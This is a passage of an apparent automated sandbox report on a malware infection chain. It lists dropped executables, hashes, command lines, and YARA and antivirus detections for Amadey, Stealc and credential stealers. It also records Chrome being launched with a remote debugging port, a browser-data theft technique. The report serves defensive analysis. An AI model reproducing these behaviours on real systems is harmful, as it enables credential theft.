                                                                                                                                                                                                                                                  Data Ascii: { "origin": "8.46.123.189"}


                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                  Start time:03:48:57
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\ebjtOH70jl.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\ebjtOH70jl.exe"
                                                                                                                                                                                                                                                  Imagebase:0xa70000
                                                                                                                                                                                                                                                  File size:3'267'072 bytes
                                                                                                                                                                                                                                                  MD5 hash:F775D21B5BFDE4169416087324A43543
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                  Start time:03:49:00
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                                                                                                                                                                                                                  Imagebase:0x670000
                                                                                                                                                                                                                                                  File size:3'267'072 bytes
                                                                                                                                                                                                                                                  MD5 hash:F775D21B5BFDE4169416087324A43543
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 63%, ReversingLabs
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                  Start time:03:50:00
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  Imagebase:0x670000
                                                                                                                                                                                                                                                  File size:3'267'072 bytes
                                                                                                                                                                                                                                                  MD5 hash:F775D21B5BFDE4169416087324A43543
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                  Start time:03:50:05
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1001527001\legs.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1001527001\legs.exe"
                                                                                                                                                                                                                                                  Imagebase:0x460000
                                                                                                                                                                                                                                                  File size:776'832 bytes
                                                                                                                                                                                                                                                  MD5 hash:75CF470500D65CE4411790E09E650806
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 96%, ReversingLabs
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                  Start time:03:50:05
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                  Start time:03:50:07
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1004899001\am209.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1004899001\am209.exe"
                                                                                                                                                                                                                                                  Imagebase:0x690000
                                                                                                                                                                                                                                                  File size:439'808 bytes
                                                                                                                                                                                                                                                  MD5 hash:CE27255F0EF33CE6304E54D171E6547C
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exe, Author: Joe Security
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                  • Detection: 79%, ReversingLabs
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                  Start time:03:50:08
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                                                                                                                                                                                                                                  Imagebase:0xdd0000
                                                                                                                                                                                                                                                  File size:439'808 bytes
                                                                                                                                                                                                                                                  MD5 hash:CE27255F0EF33CE6304E54D171E6547C
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                  Start time:03:50:09
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1001527001\legs.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1001527001\legs.exe"
                                                                                                                                                                                                                                                  Imagebase:0x460000
                                                                                                                                                                                                                                                  File size:776'832 bytes
                                                                                                                                                                                                                                                  MD5 hash:75CF470500D65CE4411790E09E650806
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2497430762.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2510620291.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2510421518.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2497003981.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2497289742.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                  Start time:03:50:09
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe"
                                                                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                                                                  File size:245'760 bytes
                                                                                                                                                                                                                                                  MD5 hash:89AD45B4A0E2D547C1E09D0A1EA94DF6
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000002.2606844881.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000000.2396771733.00000000007BB000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2605733267.000000000085C000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000002.2605307316.00000000007BB000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: infostealer_win_stealc_str_oct24, Description: Finds Stealc standalone samples (or dumps) based on the strings, Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe, Author: Sekoia.io
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                  • Detection: 100%, ReversingLabs
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                  Start time:03:50:12
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1009574001\gold123.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1009574001\gold123.exe"
                                                                                                                                                                                                                                                  Imagebase:0xc20000
                                                                                                                                                                                                                                                  File size:926'760 bytes
                                                                                                                                                                                                                                                  MD5 hash:122570B1D9D8FA848F3BFE02A1AB1A7B
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                  • Detection: 83%, ReversingLabs
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                  Start time:03:50:12
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                  Start time:03:50:13
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                                                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                                  Start time:03:50:14
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2132,i,6862776677671730943,9850295633516414463,262144 /prefetch:8
                                                                                                                                                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                                  Start time:03:50:17
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe"
                                                                                                                                                                                                                                                  Imagebase:0x490000
                                                                                                                                                                                                                                                  File size:824'832 bytes
                                                                                                                                                                                                                                                  MD5 hash:4F3C6C19B0078AFB9AC1E6D2CE6116E7
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                  • Detection: 66%, ReversingLabs
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                                  Start time:03:50:17
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                  Start time:03:50:18
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe"
                                                                                                                                                                                                                                                  Imagebase:0x490000
                                                                                                                                                                                                                                                  File size:824'832 bytes
                                                                                                                                                                                                                                                  MD5 hash:4F3C6C19B0078AFB9AC1E6D2CE6116E7
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                                  Start time:03:50:26
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1010458001\liddad.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1010458001\liddad.exe"
                                                                                                                                                                                                                                                  Imagebase:0xf0000
                                                                                                                                                                                                                                                  File size:7'833'736 bytes
                                                                                                                                                                                                                                                  MD5 hash:66178E76829F947721EE5F995434D37F
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 45%, ReversingLabs
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                                  Start time:03:50:40
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff76b250000
                                                                                                                                                                                                                                                  File size:14'379'809 bytes
                                                                                                                                                                                                                                                  MD5 hash:E8A21B7C1DBF57E585F28C10631647CF
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 5%, ReversingLabs
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                                                  Start time:03:50:43
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe"
                                                                                                                                                                                                                                                  Imagebase:0x460000
                                                                                                                                                                                                                                                  File size:14'379'809 bytes
                                                                                                                                                                                                                                                  MD5 hash:E8A21B7C1DBF57E585F28C10631647CF
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                                                  Start time:03:50:43
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                                                                  Imagebase:0x7ff6ce1d0000
                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                                  Start time:03:50:44
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                                  Start time:03:50:46
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe"
                                                                                                                                                                                                                                                  Imagebase:0xb60000
                                                                                                                                                                                                                                                  File size:5'164'032 bytes
                                                                                                                                                                                                                                                  MD5 hash:AC83F35170E7E84000CC5A17472BE30B
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001A.00000002.2966877461.0000000000B61000.00000040.00000001.01000000.0000003E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001A.00000002.2982325237.000000000159E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                                  Start time:03:50:50
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exe"
                                                                                                                                                                                                                                                  Imagebase:0x630000
                                                                                                                                                                                                                                                  File size:3'277'824 bytes
                                                                                                                                                                                                                                                  MD5 hash:97AF5B90F7A80FC9629DD3A0D3DC92A8
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000002.2866355252.0000000000631000.00000040.00000001.01000000.0000003F.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                                  Start time:03:50:53
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                  Imagebase:0x9a0000
                                                                                                                                                                                                                                                  File size:3'277'824 bytes
                                                                                                                                                                                                                                                  MD5 hash:97AF5B90F7A80FC9629DD3A0D3DC92A8
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000002.2921135605.00000000009A1000.00000040.00000001.01000000.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                                  Start time:03:50:53
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                  Imagebase:0x9a0000
                                                                                                                                                                                                                                                  File size:3'277'824 bytes
                                                                                                                                                                                                                                                  MD5 hash:97AF5B90F7A80FC9629DD3A0D3DC92A8
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001D.00000002.2925964094.00000000009A1000.00000040.00000001.01000000.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                                  Start time:03:50:54
                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
